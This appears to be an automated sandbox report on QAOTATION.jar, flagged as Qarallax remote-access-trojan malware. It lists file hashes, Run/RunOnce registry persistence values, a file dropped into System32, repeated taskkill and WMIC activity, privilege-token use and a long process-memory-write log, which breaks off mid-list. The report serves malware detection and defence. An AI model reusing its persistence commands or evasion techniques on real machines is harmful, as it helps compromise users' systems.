Analysis
-
max time kernel
148s -
max time network
112s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
19-08-2020 13:26
Static task
static1
Behavioral task
behavioral1
Sample
QAOTATION.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
QAOTATION.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
QAOTATION.jar
-
Size
399KB
-
MD5
be666fddf4e70621ec1a8fe19348bbc3
-
SHA1
132069951f67e7bd94cfce57a137b9f82ead15ad
-
SHA256
3b7e009a2ca84ce2834f422390a85515b80034e4227c05e7522b274e862c7924
-
SHA512
0ef5796a8bb0913389fefc4c940bd0200189d1227071e6a5a400c55925ee396722fa6107f91f618c9799e339a231ab43a7189378388f0551e2064d2eb9ff62fb
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0003000000013540-7.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1588 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\oWsdf\Desktop.ini java.exe File created C:\Users\Admin\oWsdf\Desktop.ini java.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\DQyVi java.exe File opened for modification C:\Windows\System32\DQyVi java.exe -
Kills process with taskkill 16 IoCs
pid Process 1768 taskkill.exe 1428 taskkill.exe 2000 taskkill.exe 1692 taskkill.exe 1540 taskkill.exe 1856 taskkill.exe 1772 taskkill.exe 1904 taskkill.exe 1940 taskkill.exe 472 taskkill.exe 1624 taskkill.exe 1764 taskkill.exe 820 taskkill.exe 1848 taskkill.exe 1624 taskkill.exe 1624 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1976 powershell.exe 1976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 97 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1692 WMIC.exe Token: SeSecurityPrivilege 1692 WMIC.exe Token: SeTakeOwnershipPrivilege 1692 WMIC.exe Token: SeLoadDriverPrivilege 1692 WMIC.exe Token: SeSystemProfilePrivilege 1692 WMIC.exe Token: SeSystemtimePrivilege 1692 WMIC.exe Token: SeProfSingleProcessPrivilege 1692 WMIC.exe Token: SeIncBasePriorityPrivilege 1692 WMIC.exe Token: SeCreatePagefilePrivilege 1692 WMIC.exe Token: SeBackupPrivilege 1692 WMIC.exe Token: SeRestorePrivilege 1692 WMIC.exe Token: SeShutdownPrivilege 1692 WMIC.exe Token: SeDebugPrivilege 1692 WMIC.exe Token: SeSystemEnvironmentPrivilege 1692 WMIC.exe Token: SeRemoteShutdownPrivilege 1692 WMIC.exe Token: SeUndockPrivilege 1692 WMIC.exe Token: SeManageVolumePrivilege 1692 WMIC.exe Token: 33 1692 WMIC.exe Token: 34 1692 WMIC.exe Token: 35 1692 WMIC.exe Token: SeIncreaseQuotaPrivilege 1692 WMIC.exe Token: SeSecurityPrivilege 1692 WMIC.exe Token: SeTakeOwnershipPrivilege 1692 WMIC.exe Token: SeLoadDriverPrivilege 1692 WMIC.exe Token: SeSystemProfilePrivilege 1692 WMIC.exe Token: SeSystemtimePrivilege 1692 WMIC.exe Token: SeProfSingleProcessPrivilege 1692 WMIC.exe Token: SeIncBasePriorityPrivilege 1692 WMIC.exe Token: SeCreatePagefilePrivilege 1692 WMIC.exe Token: SeBackupPrivilege 1692 WMIC.exe Token: SeRestorePrivilege 1692 WMIC.exe Token: SeShutdownPrivilege 1692 WMIC.exe Token: SeDebugPrivilege 1692 WMIC.exe Token: SeSystemEnvironmentPrivilege 1692 WMIC.exe Token: SeRemoteShutdownPrivilege 1692 WMIC.exe Token: SeUndockPrivilege 1692 WMIC.exe Token: SeManageVolumePrivilege 1692 WMIC.exe Token: 33 1692 WMIC.exe Token: 34 1692 WMIC.exe Token: 35 1692 WMIC.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeSecurityPrivilege 1224 WMIC.exe Token: SeTakeOwnershipPrivilege 1224 WMIC.exe Token: SeLoadDriverPrivilege 1224 WMIC.exe Token: SeSystemProfilePrivilege 1224 WMIC.exe Token: SeSystemtimePrivilege 1224 WMIC.exe Token: SeProfSingleProcessPrivilege 1224 WMIC.exe Token: SeIncBasePriorityPrivilege 1224 WMIC.exe Token: SeCreatePagefilePrivilege 1224 WMIC.exe Token: SeBackupPrivilege 1224 WMIC.exe Token: SeRestorePrivilege 1224 WMIC.exe Token: SeShutdownPrivilege 1224 WMIC.exe Token: SeDebugPrivilege 1224 WMIC.exe Token: SeSystemEnvironmentPrivilege 1224 WMIC.exe Token: SeRemoteShutdownPrivilege 1224 WMIC.exe Token: SeUndockPrivilege 1224 WMIC.exe Token: SeManageVolumePrivilege 1224 WMIC.exe Token: 33 1224 WMIC.exe Token: 34 1224 WMIC.exe Token: 35 1224 WMIC.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeSecurityPrivilege 1224 WMIC.exe Token: SeTakeOwnershipPrivilege 1224 WMIC.exe Token: SeLoadDriverPrivilege 1224 WMIC.exe Token: SeSystemProfilePrivilege 1224 WMIC.exe Token: SeSystemtimePrivilege 1224 WMIC.exe Token: SeProfSingleProcessPrivilege 1224 WMIC.exe Token: SeIncBasePriorityPrivilege 1224 WMIC.exe Token: SeCreatePagefilePrivilege 1224 WMIC.exe Token: SeBackupPrivilege 1224 WMIC.exe Token: SeRestorePrivilege 1224 WMIC.exe Token: SeShutdownPrivilege 1224 WMIC.exe Token: SeDebugPrivilege 1224 WMIC.exe Token: SeSystemEnvironmentPrivilege 1224 WMIC.exe Token: SeRemoteShutdownPrivilege 1224 WMIC.exe Token: SeUndockPrivilege 1224 WMIC.exe Token: SeManageVolumePrivilege 1224 WMIC.exe Token: 33 1224 WMIC.exe Token: 34 1224 WMIC.exe Token: 35 1224 WMIC.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 472 taskkill.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 1848 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 1904 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 1940 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1588 java.exe -
Suspicious use of WriteProcessMemory 753 IoCs
description pid Process procid_target PID 1588 wrote to memory of 1516 1588 java.exe 25 PID 1588 wrote to memory of 1516 1588 java.exe 25 PID 1588 wrote to memory of 1516 1588 java.exe 25 PID 1588 wrote to memory of 1484 1588 java.exe 26 PID 1588 wrote to memory of 1484 1588 java.exe 26 PID 1588 wrote to memory of 1484 1588 java.exe 26 PID 1484 wrote to memory of 1692 1484 cmd.exe 27 PID 1484 wrote to memory of 1692 1484 cmd.exe 27 PID 1484 wrote to memory of 1692 1484 cmd.exe 27 PID 1588 wrote to memory of 1748 1588 java.exe 28 PID 1588 wrote to memory of 1748 1588 java.exe 28 PID 1588 wrote to memory of 1748 1588 java.exe 28 PID 1748 wrote to memory of 1224 1748 cmd.exe 29 PID 1748 wrote to memory of 1224 1748 cmd.exe 29 PID 1748 wrote to memory of 1224 1748 cmd.exe 29 PID 1588 wrote to memory of 1828 1588 java.exe 30 PID 1588 wrote to memory of 1828 1588 java.exe 30 PID 1588 wrote to memory of 1828 1588 java.exe 30 PID 1588 wrote to memory of 1820 1588 java.exe 31 PID 1588 wrote to memory of 1820 1588 java.exe 31 PID 1588 wrote to memory of 1820 1588 java.exe 31 PID 1588 wrote to memory of 332 1588 java.exe 32 PID 1588 wrote to memory of 332 1588 java.exe 32 PID 1588 wrote to memory of 332 1588 java.exe 32 PID 1588 wrote to memory of 1640 1588 java.exe 33 PID 1588 wrote to memory of 1640 1588 java.exe 33 PID 1588 wrote to memory of 1640 1588 java.exe 33 PID 1588 wrote to memory of 1932 1588 java.exe 34 PID 1588 wrote to memory of 1932 1588 java.exe 34 PID 1588 wrote to memory of 1932 1588 java.exe 34 PID 1588 wrote to memory of 1584 1588 java.exe 35 PID 1588 wrote to memory of 1584 1588 java.exe 35 PID 1588 wrote to memory of 1584 1588 java.exe 35 PID 1588 wrote to memory of 1628 1588 java.exe 36 PID 1588 wrote to memory of 1628 1588 java.exe 36 PID 1588 wrote to memory of 1628 1588 java.exe 36 PID 1588 wrote to memory of 1664 1588 java.exe 37 PID 1588 wrote to memory of 1664 1588 java.exe 37 PID 1588 wrote to memory of 1664 1588 java.exe 37 PID 1588 wrote to memory of 1612 1588 java.exe 38 PID 1588 wrote to memory of 1612 1588 java.exe 38 PID 1588 wrote to memory of 1612 1588 java.exe 38 PID 1588 wrote to memory of 1976 1588 java.exe 39 PID 1588 wrote to memory of 1976 1588 java.exe 39 PID 1588 wrote to memory of 1976 1588 java.exe 39 PID 1612 wrote to memory of 2032 1612 cmd.exe 41 PID 1612 wrote to memory of 2032 1612 cmd.exe 41 PID 1612 wrote to memory of 2032 1612 cmd.exe 41 PID 1588 wrote to memory of 2020 1588 java.exe 42 PID 1588 wrote to memory of 2020 1588 java.exe 42 PID 1588 wrote to memory of 2020 1588 java.exe 42 PID 1588 wrote to memory of 2004 1588 java.exe 43 PID 1588 wrote to memory of 2004 1588 java.exe 43 PID 1588 wrote to memory of 2004 1588 java.exe 43 PID 1588 wrote to memory of 868 1588 java.exe 44 PID 1588 wrote to memory of 868 1588 java.exe 44 PID 1588 wrote to memory of 868 1588 java.exe 44 PID 1588 wrote to memory of 1076 1588 java.exe 46 PID 1588 wrote to memory of 1076 1588 java.exe 46 PID 1588 wrote to memory of 1076 1588 java.exe 46 PID 1588 wrote to memory of 1140 1588 java.exe 47 PID 1588 wrote to memory of 1140 1588 java.exe 47 PID 1588 wrote to memory of 1140 1588 java.exe 47 PID 1588 wrote to memory of 820 1588 java.exe 48 PID 1588 wrote to memory of 820 1588 java.exe 48 PID 1588 wrote to memory of 820 1588 java.exe 48 PID 1588 wrote to memory of 1432 1588 java.exe 49 PID 1588 wrote to memory of 1432 1588 java.exe 49 PID 1588 wrote to memory of 1432 1588 java.exe 49 PID 1588 wrote to memory of 1496 1588 java.exe 51 PID 1588 wrote to memory of 1496 1588 java.exe 51 PID 1588 wrote to memory of 1496 1588 java.exe 51 PID 1588 wrote to memory of 1460 1588 java.exe 52 PID 1588 wrote to memory of 1460 1588 java.exe 52 PID 1588 wrote to memory of 1460 1588 java.exe 52 PID 1588 wrote to memory of 1604 1588 java.exe 54 PID 1588 wrote to memory of 1604 1588 java.exe 54 PID 1588 wrote to memory of 1604 1588 java.exe 54 PID 1588 wrote to memory of 1504 1588 java.exe 55 PID 1588 wrote to memory of 1504 1588 java.exe 55 PID 1588 wrote to memory of 1504 1588 java.exe 55 PID 1588 wrote to memory of 1784 1588 java.exe 58 PID 1588 wrote to memory of 1784 1588 java.exe 58 PID 1588 wrote to memory of 1784 1588 java.exe 58 PID 1588 wrote to memory of 1864 1588 java.exe 60 PID 1588 wrote to memory of 1864 1588 java.exe 60 PID 1588 wrote to memory of 1864 1588 java.exe 60 PID 1588 wrote to memory of 524 1588 java.exe 62 PID 1588 wrote to memory of 524 1588 java.exe 62 PID 1588 wrote to memory of 524 1588 java.exe 62 PID 1588 wrote to memory of 1632 1588 java.exe 64 PID 1588 wrote to memory of 1632 1588 java.exe 64 PID 1588 wrote to memory of 1632 1588 java.exe 64 PID 1588 wrote to memory of 1580 1588 java.exe 66 PID 1588 wrote to memory of 1580 1588 java.exe 66 PID 1588 wrote to memory of 1580 1588 java.exe 66 PID 1588 wrote to memory of 1520 1588 java.exe 68 PID 1588 wrote to memory of 1520 1588 java.exe 68 PID 1588 wrote to memory of 1520 1588 java.exe 68 PID 1588 wrote to memory of 2008 1588 java.exe 70 PID 1588 wrote to memory of 2008 1588 java.exe 70 PID 1588 wrote to memory of 2008 1588 java.exe 70 PID 1588 wrote to memory of 1368 1588 java.exe 72 PID 1588 wrote to memory of 1368 1588 java.exe 72 PID 1588 wrote to memory of 1368 1588 java.exe 72 PID 1588 wrote to memory of 1428 1588 java.exe 73 PID 1588 wrote to memory of 1428 1588 java.exe 73 PID 1588 wrote to memory of 1428 1588 java.exe 73 PID 1588 wrote to memory of 316 1588 java.exe 74 PID 1588 wrote to memory of 316 1588 java.exe 74 PID 1588 wrote to memory of 316 1588 java.exe 74 PID 1588 wrote to memory of 2020 1588 java.exe 77 PID 1588 wrote to memory of 2020 1588 java.exe 77 PID 1588 wrote to memory of 2020 1588 java.exe 77 PID 1612 wrote to memory of 1460 1612 cmd.exe 87 PID 1612 wrote to memory of 1460 1612 cmd.exe 87 PID 1612 wrote to memory of 1460 1612 cmd.exe 87 PID 1588 wrote to memory of 1820 1588 java.exe 88 PID 1588 wrote to memory of 1820 1588 java.exe 88 PID 1588 wrote to memory of 1820 1588 java.exe 88 PID 1820 wrote to memory of 1484 1820 cmd.exe 89 PID 1820 wrote to memory of 1484 1820 cmd.exe 89 PID 1820 wrote to memory of 1484 1820 cmd.exe 89 PID 1588 wrote to memory of 2000 1588 java.exe 90 PID 1588 wrote to memory of 2000 1588 java.exe 90 PID 1588 wrote to memory of 2000 1588 java.exe 90 PID 1820 wrote to memory of 2024 1820 cmd.exe 91 PID 1820 wrote to memory of 2024 1820 cmd.exe 91 PID 1820 wrote to memory of 2024 1820 cmd.exe 91 PID 1588 wrote to memory of 1860 1588 java.exe 93 PID 1588 wrote to memory of 1860 1588 java.exe 93 PID 1588 wrote to memory of 1860 1588 java.exe 93 PID 1860 wrote to memory of 1268 1860 cmd.exe 94 PID 1860 wrote to memory of 1268 1860 cmd.exe 94 PID 1860 wrote to memory of 1268 1860 cmd.exe 94 PID 1860 wrote to memory of 1624 1860 cmd.exe 95 PID 1860 wrote to memory of 1624 1860 cmd.exe 95 PID 1860 wrote to memory of 1624 1860 cmd.exe 95 PID 1588 wrote to memory of 2008 1588 java.exe 96 PID 1588 wrote to memory of 2008 1588 java.exe 96 PID 1588 wrote to memory of 2008 1588 java.exe 96 PID 2008 wrote to memory of 1856 2008 cmd.exe 97 PID 2008 wrote to memory of 1856 2008 cmd.exe 97 PID 2008 wrote to memory of 1856 2008 cmd.exe 97 PID 1588 wrote to memory of 472 1588 java.exe 98 PID 1588 wrote to memory of 472 1588 java.exe 98 PID 1588 wrote to memory of 472 1588 java.exe 98 PID 2008 wrote to memory of 268 2008 cmd.exe 100 PID 2008 wrote to memory of 268 2008 cmd.exe 100 PID 2008 wrote to memory of 268 2008 cmd.exe 100 PID 1588 wrote to memory of 996 1588 java.exe 101 PID 1588 wrote to memory of 996 1588 java.exe 101 PID 1588 wrote to memory of 996 1588 java.exe 101 PID 996 wrote to memory of 664 996 cmd.exe 102 PID 996 wrote to memory of 664 996 cmd.exe 102 PID 996 wrote to memory of 664 996 cmd.exe 102 PID 996 wrote to memory of 1948 996 cmd.exe 103 PID 996 wrote to memory of 1948 996 cmd.exe 103 PID 996 wrote to memory of 1948 996 cmd.exe 103 PID 1588 wrote to memory of 872 1588 java.exe 104 PID 1588 wrote to memory of 872 1588 java.exe 104 PID 1588 wrote to memory of 872 1588 java.exe 104 PID 872 wrote to memory of 1504 872 cmd.exe 105 PID 872 wrote to memory of 1504 872 cmd.exe 105 PID 872 wrote to memory of 1504 872 cmd.exe 105 PID 872 wrote to memory of 332 872 cmd.exe 106 PID 872 wrote to memory of 332 872 cmd.exe 106 PID 872 wrote to memory of 332 872 cmd.exe 106 PID 1588 wrote to memory of 1404 1588 java.exe 107 PID 1588 wrote to memory of 1404 1588 java.exe 107 PID 1588 wrote to memory of 1404 1588 java.exe 107 PID 1404 wrote to memory of 1116 1404 cmd.exe 108 PID 1404 wrote to memory of 1116 1404 cmd.exe 108 PID 1404 wrote to memory of 1116 1404 cmd.exe 108 PID 1404 wrote to memory of 1752 1404 cmd.exe 109 PID 1404 wrote to memory of 1752 1404 cmd.exe 109 PID 1404 wrote to memory of 1752 1404 cmd.exe 109 PID 1588 wrote to memory of 1416 1588 java.exe 110 PID 1588 wrote to memory of 1416 1588 java.exe 110 PID 1588 wrote to memory of 1416 1588 java.exe 110 PID 1416 wrote to memory of 1780 1416 cmd.exe 111 PID 1416 wrote to memory of 1780 1416 cmd.exe 111 PID 1416 wrote to memory of 1780 1416 cmd.exe 111 PID 1588 wrote to memory of 1692 1588 java.exe 112 PID 1588 wrote to memory of 1692 1588 java.exe 112 PID 1588 wrote to memory of 1692 1588 java.exe 112 PID 1416 wrote to memory of 1496 1416 cmd.exe 114 PID 1416 wrote to memory of 1496 1416 cmd.exe 114 PID 1416 wrote to memory of 1496 1416 cmd.exe 114 PID 1588 wrote to memory of 1016 1588 java.exe 115 PID 1588 wrote to memory of 1016 1588 java.exe 115 PID 1588 wrote to memory of 1016 1588 java.exe 115 PID 1016 wrote to memory of 1360 1016 cmd.exe 116 PID 1016 wrote to memory of 1360 1016 cmd.exe 116 PID 1016 wrote to memory of 1360 1016 cmd.exe 116 PID 1016 wrote to memory of 2044 1016 cmd.exe 117 PID 1016 wrote to memory of 2044 1016 cmd.exe 117 PID 1016 wrote to memory of 2044 1016 cmd.exe 117 PID 1588 wrote to memory of 1020 1588 java.exe 118 PID 1588 wrote to memory of 1020 1588 java.exe 118 PID 1588 wrote to memory of 1020 1588 java.exe 118 PID 1020 wrote to memory of 316 1020 cmd.exe 119 PID 1020 wrote to memory of 316 1020 cmd.exe 119 PID 1020 wrote to memory of 316 1020 cmd.exe 119 PID 1020 wrote to memory of 664 1020 cmd.exe 120 PID 1020 wrote to memory of 664 1020 cmd.exe 120 PID 1020 wrote to memory of 664 1020 cmd.exe 120 PID 1588 wrote to memory of 1640 1588 java.exe 122 PID 1588 wrote to memory of 1640 1588 java.exe 122 PID 1588 wrote to memory of 1640 1588 java.exe 122 PID 1640 wrote to memory of 1996 1640 cmd.exe 123 PID 1640 wrote to memory of 1996 1640 cmd.exe 123 PID 1640 wrote to memory of 1996 1640 cmd.exe 123 PID 1640 wrote to memory of 1504 1640 cmd.exe 124 PID 1640 wrote to memory of 1504 1640 cmd.exe 124 PID 1640 wrote to memory of 1504 1640 cmd.exe 124 PID 1588 wrote to memory of 1368 1588 java.exe 125 PID 1588 wrote to memory of 1368 1588 java.exe 125 PID 1588 wrote to memory of 1368 1588 java.exe 125 PID 1368 wrote to memory of 1772 1368 cmd.exe 127 PID 1368 wrote to memory of 1772 1368 cmd.exe 127 PID 1368 wrote to memory of 1772 1368 cmd.exe 127 PID 1368 wrote to memory of 868 1368 cmd.exe 128 PID 1368 wrote to memory of 868 1368 cmd.exe 128 PID 1368 wrote to memory of 868 1368 cmd.exe 128 PID 1588 wrote to memory of 1988 1588 java.exe 129 PID 1588 wrote to memory of 1988 1588 java.exe 129 PID 1588 wrote to memory of 1988 1588 java.exe 129 PID 1988 wrote to memory of 620 1988 cmd.exe 130 PID 1988 wrote to memory of 620 1988 cmd.exe 130 PID 1988 wrote to memory of 620 1988 cmd.exe 130 PID 1588 wrote to memory of 1540 1588 java.exe 131 PID 1588 wrote to memory of 1540 1588 java.exe 131 PID 1588 wrote to memory of 1540 1588 java.exe 131 PID 1988 wrote to memory of 1552 1988 cmd.exe 133 PID 1988 wrote to memory of 1552 1988 cmd.exe 133 PID 1988 wrote to memory of 1552 1988 cmd.exe 133 PID 1588 wrote to memory of 1264 1588 java.exe 134 PID 1588 wrote to memory of 1264 1588 java.exe 134 PID 1588 wrote to memory of 1264 1588 java.exe 134 PID 1264 wrote to memory of 1456 1264 cmd.exe 135 PID 1264 wrote to memory of 1456 1264 cmd.exe 135 PID 1264 wrote to memory of 1456 1264 cmd.exe 135 PID 1264 wrote to memory of 1312 1264 cmd.exe 136 PID 1264 wrote to memory of 1312 1264 cmd.exe 136 PID 1264 wrote to memory of 1312 1264 cmd.exe 136 PID 1588 wrote to memory of 1580 1588 java.exe 137 PID 1588 wrote to memory of 1580 1588 java.exe 137 PID 1588 wrote to memory of 1580 1588 java.exe 137 PID 1580 wrote to memory of 1632 1580 cmd.exe 138 PID 1580 wrote to memory of 1632 1580 cmd.exe 138 PID 1580 wrote to memory of 1632 1580 cmd.exe 138 PID 1580 wrote to memory of 1360 1580 cmd.exe 139 PID 1580 wrote to memory of 1360 1580 cmd.exe 139 PID 1580 wrote to memory of 1360 1580 cmd.exe 139 PID 1588 wrote to memory of 1564 1588 java.exe 140 PID 1588 wrote to memory of 1564 1588 java.exe 140 PID 1588 wrote to memory of 1564 1588 java.exe 140 PID 1564 wrote to memory of 1464 1564 cmd.exe 141 PID 1564 wrote to memory of 1464 1564 cmd.exe 141 PID 1564 wrote to memory of 1464 1564 cmd.exe 141 PID 1564 wrote to memory of 472 1564 cmd.exe 142 PID 1564 wrote to memory of 472 1564 cmd.exe 142 PID 1564 wrote to memory of 472 1564 cmd.exe 142 PID 1588 wrote to memory of 1856 1588 java.exe 143 PID 1588 wrote to memory of 1856 1588 java.exe 143 PID 1588 wrote to memory of 1856 1588 java.exe 143 PID 1856 wrote to memory of 1948 1856 cmd.exe 144 PID 1856 wrote to memory of 1948 1856 cmd.exe 144 PID 1856 wrote to memory of 1948 1856 cmd.exe 144 PID 1856 wrote to memory of 1684 1856 cmd.exe 145 PID 1856 wrote to memory of 1684 1856 cmd.exe 145 PID 1856 wrote to memory of 1684 1856 cmd.exe 145 PID 1588 wrote to memory of 1140 1588 java.exe 146 PID 1588 wrote to memory of 1140 1588 java.exe 146 PID 1588 wrote to memory of 1140 1588 java.exe 146 PID 1140 wrote to memory of 1396 1140 cmd.exe 147 PID 1140 wrote to memory of 1396 1140 cmd.exe 147 PID 1140 wrote to memory of 1396 1140 cmd.exe 147 PID 1140 wrote to memory of 1820 1140 cmd.exe 148 PID 1140 wrote to memory of 1820 1140 cmd.exe 148 PID 1140 wrote to memory of 1820 1140 cmd.exe 148 PID 1588 wrote to memory of 1772 1588 java.exe 149 PID 1588 wrote to memory of 1772 1588 java.exe 149 PID 1588 wrote to memory of 1772 1588 java.exe 149 PID 1772 wrote to memory of 1604 1772 cmd.exe 150 PID 1772 wrote to memory of 1604 1772 cmd.exe 150 PID 1772 wrote to memory of 1604 1772 cmd.exe 150 PID 1588 wrote to memory of 1848 1588 java.exe 151 PID 1588 wrote to memory of 1848 1588 java.exe 151 PID 1588 wrote to memory of 1848 1588 java.exe 151 PID 1772 wrote to memory of 1632 1772 cmd.exe 153 PID 1772 wrote to memory of 1632 1772 cmd.exe 153 PID 1772 wrote to memory of 1632 1772 cmd.exe 153 PID 1588 wrote to memory of 1932 1588 java.exe 154 PID 1588 wrote to memory of 1932 1588 java.exe 154 PID 1588 wrote to memory of 1932 1588 java.exe 154 PID 1932 wrote to memory of 1464 1932 cmd.exe 155 PID 1932 wrote to memory of 1464 1932 cmd.exe 155 PID 1932 wrote to memory of 1464 1932 cmd.exe 155 PID 1932 wrote to memory of 1764 1932 cmd.exe 156 PID 1932 wrote to memory of 1764 1932 cmd.exe 156 PID 1932 wrote to memory of 1764 1932 cmd.exe 156 PID 1588 wrote to memory of 2004 1588 java.exe 157 PID 1588 wrote to memory of 2004 1588 java.exe 157 PID 1588 wrote to memory of 2004 1588 java.exe 157 PID 2004 wrote to memory of 1520 2004 cmd.exe 158 PID 2004 wrote to memory of 1520 2004 cmd.exe 158 PID 2004 wrote to memory of 1520 2004 cmd.exe 158 PID 2004 wrote to memory of 1472 2004 cmd.exe 159 PID 2004 wrote to memory of 1472 2004 cmd.exe 159 PID 2004 wrote to memory of 1472 2004 cmd.exe 159 PID 1588 wrote to memory of 1480 1588 java.exe 160 PID 1588 wrote to memory of 1480 1588 java.exe 160 PID 1588 wrote to memory of 1480 1588 java.exe 160 PID 1480 wrote to memory of 2024 1480 cmd.exe 161 PID 1480 wrote to memory of 2024 1480 cmd.exe 161 PID 1480 wrote to memory of 2024 1480 cmd.exe 161 PID 1480 wrote to memory of 1996 1480 cmd.exe 162 PID 1480 wrote to memory of 1996 1480 cmd.exe 162 PID 1480 wrote to memory of 1996 1480 cmd.exe 162 PID 1588 wrote to memory of 1396 1588 java.exe 163 PID 1588 wrote to memory of 1396 1588 java.exe 163 PID 1588 wrote to memory of 1396 1588 java.exe 163 PID 1396 wrote to memory of 868 1396 cmd.exe 164 PID 1396 wrote to memory of 868 1396 cmd.exe 164 PID 1396 wrote to memory of 868 1396 cmd.exe 164 PID 1396 wrote to memory of 1552 1396 cmd.exe 165 PID 1396 wrote to memory of 1552 1396 cmd.exe 165 PID 1396 wrote to memory of 1552 1396 cmd.exe 165 PID 1588 wrote to memory of 1920 1588 java.exe 166 PID 1588 wrote to memory of 1920 1588 java.exe 166 PID 1588 wrote to memory of 1920 1588 java.exe 166 PID 1588 wrote to memory of 1624 1588 java.exe 167 PID 1588 wrote to memory of 1624 1588 java.exe 167 PID 1588 wrote to memory of 1624 1588 java.exe 167 PID 1920 wrote to memory of 2044 1920 cmd.exe 169 PID 1920 wrote to memory of 2044 1920 cmd.exe 169 PID 1920 wrote to memory of 2044 1920 cmd.exe 169 PID 1920 wrote to memory of 1556 1920 cmd.exe 170 PID 1920 wrote to memory of 1556 1920 cmd.exe 170 PID 1920 wrote to memory of 1556 1920 cmd.exe 170 PID 1588 wrote to memory of 1760 1588 java.exe 171 PID 1588 wrote to memory of 1760 1588 java.exe 171 PID 1588 wrote to memory of 1760 1588 java.exe 171 PID 1760 wrote to memory of 820 1760 cmd.exe 172 PID 1760 wrote to memory of 820 1760 cmd.exe 172 PID 1760 wrote to memory of 820 1760 cmd.exe 172 PID 1760 wrote to memory of 1848 1760 cmd.exe 173 PID 1760 wrote to memory of 1848 1760 cmd.exe 173 PID 1760 wrote to memory of 1848 1760 cmd.exe 173 PID 1588 wrote to memory of 1628 1588 java.exe 174 PID 1588 wrote to memory of 1628 1588 java.exe 174 PID 1588 wrote to memory of 1628 1588 java.exe 174 PID 1628 wrote to memory of 664 1628 cmd.exe 175 PID 1628 wrote to memory of 664 1628 cmd.exe 175 PID 1628 wrote to memory of 664 1628 cmd.exe 175 PID 1628 wrote to memory of 1520 1628 cmd.exe 176 PID 1628 wrote to memory of 1520 1628 cmd.exe 176 PID 1628 wrote to memory of 1520 1628 cmd.exe 176 PID 1588 wrote to memory of 1484 1588 java.exe 177 PID 1588 wrote to memory of 1484 1588 java.exe 177 PID 1588 wrote to memory of 1484 1588 java.exe 177 PID 1484 wrote to memory of 1664 1484 cmd.exe 178 PID 1484 wrote to memory of 1664 1484 cmd.exe 178 PID 1484 wrote to memory of 1664 1484 cmd.exe 178 PID 1484 wrote to memory of 1392 1484 cmd.exe 179 PID 1484 wrote to memory of 1392 1484 cmd.exe 179 PID 1484 wrote to memory of 1392 1484 cmd.exe 179 PID 1588 wrote to memory of 1164 1588 java.exe 180 PID 1588 wrote to memory of 1164 1588 java.exe 180 PID 1588 wrote to memory of 1164 1588 java.exe 180 PID 1164 wrote to memory of 1748 1164 cmd.exe 181 PID 1164 wrote to memory of 1748 1164 cmd.exe 181 PID 1164 wrote to memory of 1748 1164 cmd.exe 181 PID 1164 wrote to memory of 1568 1164 cmd.exe 182 PID 1164 wrote to memory of 1568 1164 cmd.exe 182 PID 1164 wrote to memory of 1568 1164 cmd.exe 182 PID 1588 wrote to memory of 1504 1588 java.exe 183 PID 1588 wrote to memory of 1504 1588 java.exe 183 PID 1588 wrote to memory of 1504 1588 java.exe 183 PID 1504 wrote to memory of 1976 1504 cmd.exe 184 PID 1504 wrote to memory of 1976 1504 cmd.exe 184 PID 1504 wrote to memory of 1976 1504 cmd.exe 184 PID 1504 wrote to memory of 1768 1504 cmd.exe 185 PID 1504 wrote to memory of 1768 1504 cmd.exe 185 PID 1504 wrote to memory of 1768 1504 cmd.exe 185 PID 1588 wrote to memory of 868 1588 java.exe 186 PID 1588 wrote to memory of 868 1588 java.exe 186 PID 1588 wrote to memory of 868 1588 java.exe 186 PID 868 wrote to memory of 2036 868 cmd.exe 187 PID 868 wrote to memory of 2036 868 cmd.exe 187 PID 868 wrote to memory of 2036 868 cmd.exe 187 PID 868 wrote to memory of 1828 868 cmd.exe 188 PID 868 wrote to memory of 1828 868 cmd.exe 188 PID 868 wrote to memory of 1828 868 cmd.exe 188 PID 1588 wrote to memory of 1368 1588 java.exe 189 